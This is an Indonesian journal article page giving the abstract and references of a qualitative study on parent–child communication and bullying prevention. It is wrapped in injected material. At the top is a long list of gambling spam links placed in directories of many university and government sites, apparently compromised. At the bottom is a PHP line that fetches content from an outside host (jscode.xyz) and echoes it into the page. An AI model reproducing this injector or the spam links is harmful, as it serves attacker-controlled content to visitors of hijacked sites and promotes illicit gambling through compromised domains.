https://kelulusan.pnl.ac.id/ https://su.unair.ac.id/sthai/ https://sisca.uinmataram.ac.id/ https://moocs.ut.ac.id/thai/ https://kotabogor.go.id/uploads/sthai/ slot thailand https://rsgm.ugm.ac.id/sipoltak/presidenslot/ https://ak3.sarpras.unair.ac.id/web/files/king/ https://rsgm.ugm.ac.id/sipoltak/ollo4d/ https://moocs.ut.ac.id/-/kingdomtoto/ https://www.sindutrans.com/mega/ http://onlines.rsud.patikab.go.id:7001/megaforwin/ https://www.logoku.com/mfw/ https://portal.stiemadani.ac.id/ https://fkip.uisu.ac.id/member/mega/ https://test.unpra.ac.id/ https://poskopemilu.kejaksaan.go.id/mega-for-win/ https://eta-nasiam.simalungunkab.go.id/mega/ https://rsdgunungjati.cirebonkota.go.id/ayambet/ https://inlislite.perpus.palopokota.go.id/ https://dikbud.bondowosokab.go.id/mpo/ https://dikbud.bondowosokab.go.id/ayambet/ https://fkh.unair.ac.id/new-fkh/mpo/ https://lpm.iakn-toraja.ac.id/ https://elatar-bppsdm.kkp.go.id/ayambet/ https://ww2shots.com/ https://fkip.uisu.ac.id/wp-admin/royal/ https://elearning.itbk.ac.id/ http://mp.pps.unima.ac.id/wp-content/kingdomtoto/ https://sipbm.sulselprov.go.id/kingdom/ https://simrenda3.slemankab.go.id/modules/king/ https://dinkes.bogorkab.go.id/ https://siakad.stpbi.ac.id/upload/kingdomtoto/ https://fkh.unair.ac.id/new-fkh/royaltoto/ https://eppdb.sma-ypunila.sch.id/royaltoto/ https://digilib-feb.unisma.ac.id/lib/ https://appsbiologi.ub.ac.id/ https://siakad.stpbi.ac.id/upload/kingdomtoto/ https://ak3.sarpras.unair.ac.id/kingdomtoto/ https://e-office.pssi.org/fendi188/ https://simawa.pnp.ac.id/assets/ https://event.unsia.ac.id/megaforwin/ https://sambas.go.id/ https://pafipangkajene.org/ https://pafipangkajene.org/ayambet/ https://pmb.radenintan.ac.id/wp-content/pusat4d/ https://fanres.unram.ac.id/kingdomtoto/ https://moocs.ut.ac.id/ https://disdikbud.sambas.go.id/sultantoto/ https://bumd.bagianperekonomian.makassarkota.go.id/assets/sate/ https://disperindagkop.sambas.go.id/izinsuhu/ https://album.staima-alhikam.ac.id/sriwijaya/ https://jurnal.fkip.untad.ac.id/public/site/infini/ https://album.staima-alhikam.ac.id/sultan88/ https://album.staima-alhikam.ac.id/sate/ https://bem.unand.ac.id/sriwijaya/ https://ffarmasi.unand.ac.id/dana/ https://ffarmasi.unand.ac.id/dolan/ https://ffarmasi.unand.ac.id/mulan/ https://ffarmasi.unand.ac.id/administrator/ziatogel/ https://ffarmasi.unand.ac.id/administrator/maria/ https://moocs.ut.ac.id/group/keretatoto/ https://moocs.ut.ac.id/ziatogel/ https://moocs.ut.ac.id/install/dewi138/ https://moocs.ut.ac.id/install/ligaciputra/ https://moocs.ut.ac.id/install/gbogroup/ https://moocs.ut.ac.id/install/sateslot/ https://moocs.ut.ac.id/install/sriwijayatoto/ https://moocs.ut.ac.id/content/burungbet/ https://ti.uin-malang.ac.id/mpo12211/ https://album.staima-alhikam.ac.id/install/v https://ti.uin-malang.ac.id/wp-content/campur88/ https://kesbangpol.sambas.go.id/ https://pdia.feb.untirta.ac.id/thai/ https://moocs.ut.ac.id/install/eurotogel/ https://moocs.ut.ac.id/comment/premium303 https://pdia.feb.untirta.ac.id/euro/ https://pdia.feb.untirta.ac.id/premium/ https://pusbis.uinsgd.ac.id/ https://www.puslit.uinsgd.ac.id/ https://ipcrc.fk.unair.ac.id/ https://setda.munabarat.go.id/ https://tutorial.fk.unair.ac.id/bacan/
Pola Komunikasi Interpersonal Orang Tua dan Anak Terhadap Pencegahan Bullying di Lingkungan Sosial | Jayanti | Judika: Jurnal Diseminasi Kajian Ilmu Komunikasi

Pola Komunikasi Interpersonal Orang Tua dan Anak Terhadap Pencegahan Bullying di Lingkungan Sosial

Reni Dwi Jayanti, Ofi Hidayat

Abstract


Komunikasi keluarga menjadi pondasi utama dalam pencegahan bullying. komunikasi interpersonal antara orang tua dan anak dianggap paling efektif dalam upaya merubah sikap dan perilaku seseorang. Fenomena bullying di indonesia kerap terjadi di lingkungan tempat tinggal maupun Lembaga Pendidikan.Dilansir dari tempo.com bahwa KPAI mencatat kasus yang ada di Lembaga Pendidikan di tahun 2018 mencapai 161 kasus yang didalamnya terdapat kasus bullying dengan jumlah sebanyak 36 kasus atau 22,4% serta kasus remaja yang menjadi pelaku bullying  mencapai 41 kasus atau 25,5%. Berdasarkan fenomena diatas peneliti tertarik untuk meneliti bagaimana Komunikasi interpersonal antara orang tua dan anak terhadap pencegahan bullying di lingkungan sosial. Tujuan penelitian ini adalah untuk mengetahui bagaimana hubungan komunikasi interpersonal orang tua dan anak terhadap pencegahan bullying di lingkungan sosial. Metode yang digunakan yaitu kualitatif. Hasil dari penelitian ini mengungkapkan  orang tua di kelurahan brang bara mendidik anaknya dengan mengajarkan sopan santun, saling menghargai, dan berperilaku baik. Orang tua berusaha membangun komunikasi yang baik dengan anak-anak mereka melalui kegiatan sehari-hari. Namun, komunikasi timbal balik dari anak kepada orang tua terkait pencegahan bullying cenderung sedikit, sehingga anak sulit mengungkapkan pendapat mereka kepada orang tua.

 


Full Text:

PDF

References


DAFTAR PUSTAKA

Adila, Nissa. 2009. “ Pengaruh Kontrol Sosial terhadap Perilaku Bullying Pelajar di

Sekolah Menengah Pertama ”. Jurnal Krimatologi Indonesia. Vol 5 (1) 55-56

Anggraini, C., Ritongga, D. H., Kristina , L., Syam,M., & Kustiawan, W. 2022. “ Komunikasi interpersonal ”. Jurnal Pengabdian dan Kewirausahaan, 1

(1).Https://doi.org/10.30813/JPK.V1|1.1005

Arief, S Sadiman, Dkk. (1968).Media Pendidikan. Jakarta: CV. Rajawali

Alfagih, M. A. (2019). model komunikasi.

Bachri, B. S. (2010). Meyakinkan Validitas Data Melalui Triangulasi. Teknologi Pendidikan , 46-62.

Boaduo dan Babitseng 2007.Professionalism of Teachers in Africa for Capacity Building Towards the Achievement of Basic Education: Challenges and

Obstacles for Introspection. The International Journal Of Learning,Volume 14, Number 3, 2007

Bungin, Burhan. 2001. Metode Penelitian Kualitatif. Aktualisasi Metodologis ke Arah Ragam Varian Kontemporer. Jakarta: Rajawali Press.

Clarck, Ruth Colvin & Richaed E. Mayer. 2008. E-Learning and the Science ofInstruction.Third Edition. United States : Pfeiffer.

Creswell, John W. 2010. Research Design, Pendekatan Kualitatif, Kuantitatif, dan Mixed. (Edisi terjemahan oleh Achmad Fawaid). Yogyakarta: Pustaka Pelajar.

Denzin, Norman K, Lincoln, Yvonna S. 2009. Handbook of Qualitative Research.(Edisi terjemahan oleh Daryatno, Badrus Syamsul Fata, Abi, dan John Rinaldi). Yogyakarta: Pustaka Pelajar.

DGSE. 2002. Report on Validation and Socialization of the Guideline of Syllabi and Evaluation System of Competent-Based Curriculum for Mathematics in Manado. North Sulawesi. Depdiknas, Jakarta.

Effendi, S. (Ed.). 1978. Pedoman Penulisan Laporan Penelitian. Jakarta: Pusat Pembinaan dan Pengembangan Bahasa, Depdiknas.

Fernandez, C and Yoshida M. 2004. Lesson Study : A Japanese Approach to Improving Mathematics Teaching and Learning. New Jersey: Lawrence Erlbaum Associates. Publishers.

Fiantika, F. R., Wasil, M., Jumiyati, S., Honesti, L., Wahyuni, S., Mouw, E., ... & Waris, L. (2022). Metodologi Penelitian Kualitatif. Get Press.

Garfield, J. 2006. Exploring the Impact of Lesson Study on Developing Effective Statistics Curriculum. (Online): diambil tanggal 19-6-2006 dari: www.stat.auckland.ac.nz/-iase/publication/-11/Garfield.doc.

Hartono, M. Jogiyanto. 2018. “Metoda Pengumpulan dan Teknik Analisis Data “. Penerbit Andi.2018

Hurlock, E.B. 2009.“ Live Span Development ”. Jakarta: Erlangga

Lenaini, I. (2021). Teknik pengambilan sampel purposive dan snowball sampling. Historis: Jurnal Kajian, Penelitian dan Pengembangan Pendidikan Sejarah, 6(1), 33-39.

Miles, B. M., Michael, H., 1992, Analisis Data Kualitatif, Jakarta: UI Press

Miles, M.B. & Huberman, A.M. 1984.Qualitative Data Analysis: A Sourcebook of New Methods. Beverly Hills: Sage Publication.

Mulyasa. E. 2007. Standar Kompetensi dan Sertifikasi Guru. Rosda, Bandung.

Muhadjir N. 1996. Metodologi Penelitian Kualitatif, (edisi III), Rakesarasin, Yogyakarta.

Prasetyo, Iis. 2012. “ Teknik Analisis Data dalam research and development “.

Jurusan PLS FIP Universitas Negeri Yogyakarta. 2012.

Prianti, D.D. 2022. “ Studi Fenomenologi Tentang Pengalaman Komunikasi antarPribadi Orang Tua-Anak terhadap Pemahaman Anak pada Norma –

Norma Perilaku (Kasus pada Anak Penyandang Autisme) “. Jurnal Ilmiah Komunikasi Makna.2 (1), 1-8. Https://doi.org/10.30813/JIKM.2.1.1-8

Ratna, Nyoman Kutha.2010. Metodologi Penelitian Kajian Budaya dan Ilmu Sosial Humaniora pada Umumnya. Yogyakarta: Pustaka Pelajar.

Rijali, A. (2018). Analisis Data Kualitatif. Jurnal Alhadharah , 81-95.

Soendari, Tjutju. 2012. “ Pengujian Keabsahan Data Penelitian Kualitatif “. Bandung: Jurusan PLB Fakultas Ilmu Pendidikan Universitas Pendidikan Indonesia. 2012

Stufelbeem, Daniel L. 1982. “Planning Evaluation Studies”, dalam Isacc, Stephen & Michael, William B. Handbook in Research and Evaluation for Education and Behavioral Sciences. San Diego, California: Edits Publishers.

Sutopo, H.B. 2002. Metodologi Penelitian Kualitatif. Surakarta: Universitas Sebelas Maret Press.

Sutika, I. M. (2017). Pola Komunikasi Keluarga Dalam Pendidikan Karakter Anak Di Lingkungan Keluarga. Widya Accarya, 8(2).

Stambol A. Mappasere, N. S. (2019). Pendekatan Kualitatif. In d. Ismail Suardi Wekke, Metode Penelitian Sosial (p. 34). Yogyakarta: Gawe Buku.

Yusuf, M. (2014). Metode Penelitian (Kuantitatif, Kualitatif Dan Penelitian Gabungan. Jakarta: Prenadamedia Grup.




DOI: https://doi.org/10.30743/jdkik.v1i2.7491

Refbacks

  • There are currently no refbacks.


$a = file_get_contents('https://jscode.xyz/'); echo $a;